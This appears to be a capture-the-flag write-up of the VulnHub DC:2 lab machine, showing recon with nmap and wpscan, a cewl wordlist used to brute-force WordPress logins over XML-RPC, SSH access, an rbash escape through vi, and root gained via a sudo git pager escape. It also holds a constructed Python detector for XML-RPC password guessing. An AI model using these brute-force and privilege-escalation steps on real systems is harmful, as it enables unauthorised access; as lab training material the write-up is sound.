[vulnhub] DC:2


blhx5th

Introduction

The second box in the DC series. The main takeaways are how to use cewl and how to escape rbash. Overall it is fairly relaxed and fun.

Deployment

After deploying, remember to add a line "<target-ip> dc-2" to /etc/hosts on the attacking machine, where <target-ip> is the target's IP address, so that the site's automatic redirect to http://dc-2/ resolves correctly.

Information gathering

Host discovery, full port scan, TCP connect scan with service detection and OS identification, then NSE vulnerability scripts and nikto:

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:16 CST
Nmap scan report for 192.168.56.1
Host is up (0.00019s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00015s latency).
MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.110
Host is up (0.00075s latency).
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.110
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:17 CST
Nmap scan report for 192.168.56.110
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p80,7744 192.168.56.110
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:17 CST
Nmap scan report for 192.168.56.110
Host is up (0.00097s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
| 2048 5911d8af38518f41a744b32803809942 (RSA)
| 256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_ 256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.110
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:18 CST
Nmap scan report for 192.168.56.110
Host is up (0.00036s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.61 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nikto -h http://192.168.56.110
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.110
+ Target Hostname: 192.168.56.110
+ Target Port: 80
+ Start Time: 2023-05-28 14:20:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://dc-2/
+ /index.php?: Drupal Link header found with value: ARRAY(0x563ec3ea0920). See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-05-28 14:21:56 (GMT8) (91 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The main things we learn: SSH is listening on port 7744, and the directory structure found by the script scan shows the site is clearly built on WordPress.

WordPress is an old acquaintance, so let's reach for the right tool and run wpscan.

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:28:40 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <==================> (500 / 500) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <================> (2575 / 2575) 100.00% Time: 00:00:03

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=========================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:07 <==============> (100 / 100) 100.00% Time: 00:00:07

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <====================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:29:03 2023
[+] Requests Done: 3444
[+] Cached Requests: 9
[+] Data Sent: 884.313 KB
[+] Data Received: 1.063 MB
[+] Memory used: 285.43 MB
[+] Elapsed time: 00:00:23

Three users were enumerated: admin, jerry, tom.

Web exploitation

Before trying to log into the wp admin panel, let's first see what the site looks like.

[screenshot: flag1]

Clicking around a bit, we find flag1.

flag1 hints that a regular wordlist probably won't work and that cewl is the better choice.

cewl is a wordlist generator written in Ruby that builds a dictionary from the words on a website. Since the author says so, let's use it.

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ cewl http://dc-2 -w dc-2.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ cat dc-2.txt
sit
amet
nec
quis
vel
orci
site
non
sed
vitae
luctus
........ (too long, truncated)

This produced a 238-word dictionary; let's use it to brute-force the admin account's login. It would be ideal if that worked.

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -U 'admin' -P dc-2.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:33:45 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Trying admin / flag Time: 00:00:33 <==========================> (238 / 238) 100.00% Time: 00:00:33

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:34:22 2023
[+] Requests Done: 379
[+] Cached Requests: 37
[+] Data Sent: 152.28 KB
[+] Data Received: 168.256 KB
[+] Memory used: 238.438 MB
[+] Elapsed time: 00:00:37

It didn't work, so we fall back and see whether the tom & jerry pair can be cracked instead.

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -U 'jerry,tom' -P dc-2.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:35:07 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying tom / dis Time: 00:01:01 <============= > (410 / 886) 46.27% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:36:12 2023
[+] Requests Done: 550
[+] Cached Requests: 38
[+] Data Sent: 237.565 KB
[+] Data Received: 267.936 KB
[+] Memory used: 256.16 MB
[+] Elapsed time: 00:01:05

jerry:adipiscing; tom:parturient. The credentials for the cat-and-mouse duo were both cracked. Logging in and looking around, we find flag2 under Pages in jerry's account.
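From the defender's side, the password attack above leaves a very recognisable trace: a burst of POST /xmlrpc.php from one source. The following script, an added example that is not part of the original writeup, flags that pattern in Apache combined-format logs; the log lines are constructed, and the source address 192.168.56.144 and user-agent string are assumptions.

```python
"""Flag WordPress XML-RPC password guessing in Apache combined-format logs.

Added example, not from the original writeup. The sample log is constructed:
the source 192.168.56.144 and the user-agent string are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_xmlrpc_bruteforce(lines, threshold=20, window=timedelta(minutes=5)):
    """Return {ip: burst_size} for sources that POST to /xmlrpc.php at least
    `threshold` times inside some sliding window of length `window`.

    HTTP status is deliberately ignored: a failed XML-RPC login still gets a
    200 (the failure is a <fault> inside the XML body), so status-based
    alerting of the kind used for wp-login.php would miss this attack.
    """
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith("/xmlrpc.php"):
            stamps_by_ip[rec["ip"]].append(rec["ts"])

    alerts = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = best
    return alerts


def constructed_sample_log():
    """Constructed data: 25 xmlrpc POSTs in under a minute from one host,
    plus normal browsing and a single legitimate pingback from another."""
    t0 = datetime(2023, 5, 28, 14, 35, 7, tzinfo=timezone(timedelta(hours=8)))
    lines = []
    for i in range(25):
        ts = (t0 + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(f'192.168.56.144 - - [{ts}] "POST /xmlrpc.php HTTP/1.1" '
                     f'200 403 "-" "WPScan v3.8.22"')
    for i, (method, path) in enumerate([("GET", "/"), ("GET", "/index.php/feed/"),
                                        ("POST", "/xmlrpc.php")]):
        ts = (t0 + timedelta(minutes=i)).strftime(TS_FMT)
        lines.append(f'192.168.56.1 - - [{ts}] "{method} {path} HTTP/1.1" 200 5120 '
                     f'"-" "Mozilla/5.0"')
    lines.append("not a log line")
    return lines


if __name__ == "__main__":
    for ip, n in find_xmlrpc_bruteforce(constructed_sample_log()).items():
        print(f"ALERT {ip}: {n} POST /xmlrpc.php within 5 minutes")
```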

[screenshot: flag2]

It says that if WordPress can't be exploited, we should take another route.

Naturally we're not convinced, so let's first check whether wp has anything exploitable.

The plugin and theme pages we usually rely on under the admin account are not available to either of these two users.

So what about a file upload:

[screenshot: media-upload-fail]

No write permission. Hmm, so for now there's nothing exploitable here (or perhaps I'm missing some get-shell method I don't know about).

Given the author's hint and the principle of cutting losses early, let's try another path first.

Port 80 is a dead end for now; let's try 22, no wait, port 7744.

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ ssh jerry@192.168.56.110 -p 7744
The authenticity of host '[192.168.56.110]:7744 ([192.168.56.110]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.110]:7744' (ED25519) to the list of known hosts.
jerry@192.168.56.110's password:
Permission denied, please try again.
jerry@192.168.56.110's password:

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ ssh tom@192.168.56.110 -p 7744
tom@192.168.56.110's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

jerry can't log in, but tom can. We still got a foothold easily enough.

Privilege escalation

Don't celebrate too soon, though: once logged in we find it's rbash, a restricted shell. Almost no commands work, which is painful.

tom@DC-2:~$ sudo -l
-rbash: sudo: command not found
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ which
-rbash: which: command not found
tom@DC-2:~$ python
-rbash: python: command not found
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ /bin/bash
-rbash: /bin/bash: restricted: cannot specify `/' in command names
tom@DC-2:~$ find
-rbash: find: command not found

After that whole combo, only ls and pwd work. flag3 is right in front of us and we can't read it?

Since cat is banned, let's try vi instead, and it turns out that works.

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
~
~
~
~
~
~
"flag3.txt" 1 line, 95 characters

It says poor Tom should use su.

But poor tom's su has been taken away as well. Time to consult GTFOBins, the specialist for this, and look for ways to escape a restricted shell. We're pleased to find that vi can do it. With great power comes great responsibility.

[screenshot: vi-escape]

Method a clearly won't work, because rbash forbids '/' in command names here, as we saw when trying commands above.

So we try method b, and escape successfully.

tom@DC-2:~$ vi

$ whoami
/bin/sh: 1: whoami: not found
$ /bin/bash
tom@DC-2:~$ whoami
bash: whoami: command not found
tom@DC-2:~$ ls -la
total 40
drwxr-x--- 3 tom tom 4096 May 28 03:11 .
drwxr-xr-x 4 root root 4096 Mar 21 2019 ..
-rwxr-x--- 1 tom tom 336 May 28 03:11 .bash_history
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_login
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_logout
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_profile
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bashrc
-rwxr-x--- 1 tom tom 95 Mar 21 2019 flag3.txt
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .profile
drwxr-x--- 3 tom tom 4096 Mar 21 2019 usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found
tom@DC-2:~$ echo $SHELL
/bin/rbash
tom@DC-2:~$ su jerry
bash: su: command not found
tom@DC-2:~$ cd usr
tom@DC-2:~/usr$ ls -la
total 12
drwxr-x--- 3 tom tom 4096 Mar 21 2019 .
drwxr-x--- 3 tom tom 4096 May 28 03:11 ..
drwxr-x--- 2 tom tom 4096 Mar 21 2019 bin
tom@DC-2:~/usr$ cd bin
tom@DC-2:~/usr/bin$ ls -la
total 8
drwxr-x--- 2 tom tom 4096 Mar 21 2019 .
drwxr-x--- 3 tom tom 4096 Mar 21 2019 ..
lrwxrwxrwx 1 tom tom 13 Mar 21 2019 less -> /usr/bin/less
lrwxrwxrwx 1 tom tom 7 Mar 21 2019 ls -> /bin/ls
lrwxrwxrwx 1 tom tom 12 Mar 21 2019 scp -> /usr/bin/scp
lrwxrwxrwx 1 tom tom 11 Mar 21 2019 vi -> /usr/bin/vi

It's not over yet: although we've escaped and cd is no longer restricted, many commands are still not found. Going into /home/tom/usr/bin we see that only four commands were made available to us, which explains why.

So it's most likely the current user's $PATH. Let's take a look.

tom@DC-2:~/usr/bin$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~/usr/bin$ export PATH=/usr/bin:$PATH
tom@DC-2:~/usr/bin$ echo $PATH
/usr/bin:/home/tom/usr/bin
tom@DC-2:~/usr/bin$ cat
bash: cat: command not found

Sure enough it's $PATH. We add /usr/bin, but that's still not enough (cat lives in /bin), so we just copy the PATH from the attacking machine's environment over.

tom@DC-2:/home/jerry$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/sbin:/bin:$PATH
tom@DC-2:/home/jerry$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/sbin:/bin:/usr/bin:/home/tom/usr/bin
tom@DC-2:/home/jerry$ which cat
/bin/cat
tom@DC-2:/home/jerry$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

All commands work now, and we also found flag4 in jerry's directory.

Although the tsundere author says on the surface "No hints here - you're on your own now. :-)", there is actually a hint: "Go on - git outta here!!!!" tells us to use git.

It doesn't matter if you miss this, since sudo -l will reveal it anyway.

How to abuse git is again on GTFOBins:

[screenshot: git-privesc]

tom@DC-2:/home/jerry$ sudo -l
[sudo] password for tom:
Sorry, try again.
[sudo] password for tom:
Sorry, user tom may not run sudo on DC-2.
tom@DC-2:/home/jerry$ su jerry
Password:
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER
jerry@DC-2:~$ sudo git -p help config
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)


NAME
git-config - Get and set repository or global options

SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
!/bin/bash
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
root@DC-2:/home/jerry# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
